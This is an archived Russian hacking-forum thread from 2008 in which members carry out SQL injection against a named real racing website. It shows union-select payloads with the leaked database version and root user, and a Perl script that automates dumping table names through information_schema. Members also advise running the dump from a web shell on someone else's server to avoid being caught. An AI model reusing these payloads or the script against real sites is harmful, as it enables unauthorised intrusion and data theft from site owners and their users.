ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
27.01.2008, 18:50
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Сообщение от Sharingan
ордер бай не пашет, вроде
http://atv.worcsracing.com/tracks.php?ID=-1+union+select+1/*
посмотрите кто нить как там
Пашет, попробуй так
http://atv.worcsracing.com/tracks.php?ID=-1+order+by+26/*
и так
http://atv.worcsracing.com/tracks.php?ID=-1+order+by+25/*
http://atv.worcsracing.com/tracks.php?ID=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,1,1,1,1,1,1/*
4.0.21-nt/worcsatv/root@localhost
Последний раз редактировалось ElteRUS; 27.01.2008 в 18:53..
|
|
|
27.01.2008, 19:28
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Сообщение от Derec
Скажите пожалуйста, если таблицы выводятся посредством limit, и их очень много, как можно автоматизировать процесс?
Полчаса назад писал для себя:
PHP код:
#!/usr/bin/perl
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
$x=0;
$y = $ARGV[0];
open(TT,">","mda.txt") or die "$!";
while ($x<=$y)
{
$omfg = $ua->get("СКУЕЛЬ")->content;
$omfg =~m%:::(.*?):::%i)
$table = $1;
print TT $table, "\n";
$x++;
}
close TT;
В get("СКУЕЛЬ") должна быть скуль вида:
http://site.com/index.php?id=1+union+select+ concat(0x3a3a3a,table_name ,0x3a3a3a)+from+information_schema.tables+limit+ $x,1/*
Участки выделенные красным обязательны в запросе. Запускаешь скрипт, вводишь кол-во таблиц/полей/ещё чего то, которое нужно сдампить. Всё сохраняет в текстовик mda.txt
ЗЫ Писалось на скорую руку для себя, так что любители дое*аться к коду идут лесом(:
Последний раз редактировалось .Slip; 27.01.2008 в 22:10..
Причина: переделал под запуск с шелла
|
|
|
|
27.01.2008, 21:51
|
|
Новичок
Регистрация: 09.11.2007
Сообщений: 24
Провел на форуме:
60954
Репутация:
3
|
|
.Slip , Constantine, спасибо за отклик! Только вот не бейте ногами, объясните как ентот скрипт в винде то запустить  |
|
|
|
27.01.2008, 21:57
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
устанавливаешь perl-интерпретатор. Потом
пуск->
выполнить->
cmd->
<путь к интерпретатору>/perl.exe <путь к скрипту>/script.pl
|
|
|
|
27.01.2008, 22:14
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Сообщение от Derec
.Slip , Constantine, спасибо за отклик! Только вот не бейте ногами, объясните как ентот скрипт в винде то запустить Или так как написал Afost, или одно из двух(:
Если большая база (мне пришлось 1к. дампить), то что бы не спалиться дико, запускай с шелла. Заливай файл с расширением .pl на сервер, и запускаешь такой командой:
perl blablabla.pl 400
где 400 - нужное кол-во записей для сохранения. Скорей всего тебя скинет с шелла, т.к. скорость работы скрипта невысокая (будет тайм-аут), то ждёшь энное время и заходишь заново в папку , там уже должен лежать файл mda.txt . Если его размер 0 байт, то ждёшь ещё= ) Если всё таки хочешь запускать со своего компа, то ставишь актив перл и в cmd пишешь blablabla.pl 400
Последний раз редактировалось .Slip; 27.01.2008 в 22:21..
|
|
|
|
27.01.2008, 22:25
|
|
Новичок
Регистрация: 09.11.2007
Сообщений: 24
Провел на форуме:
60954
Репутация:
3
|
|
Aга, спасибо. Но вы уж простите, не могу отблагодарить плюсиком А вот этот шелл он должен быть получается на локальном хосте? |
|
|
|
27.01.2008, 22:26
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Нет, как раз с локалхоста ты можешь запустить через консоль(цмд). Шелл должен быть на любом стороннем серванте.
|
|
|
|
27.01.2008, 22:28
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
Так же не забываем про тулзу от SQLHack'a =)
на днях пришлось дампить 37к, так что как вариант)
|
|
|
|
27.01.2008, 22:30
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
Как делал я.
1)Писал подобный скрипт но на пхп.
2)заливал на хост и ставил диапазон 1..1000(например)
3)запускал
4)скрипт через некоторое время переставал работать, я смотрел на конечную запись и дописывал в скрипт нужный диапазон (например 439..1000)
|
|
|
|
27.01.2008, 22:33
|
|
Новичок
Регистрация: 09.11.2007
Сообщений: 24
Провел на форуме:
60954
Репутация:
3
|
|
АГА, а ваше мнение какой вариант лучше?
З.Ы. А Я могу оценить если репут. не меньше 10?
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
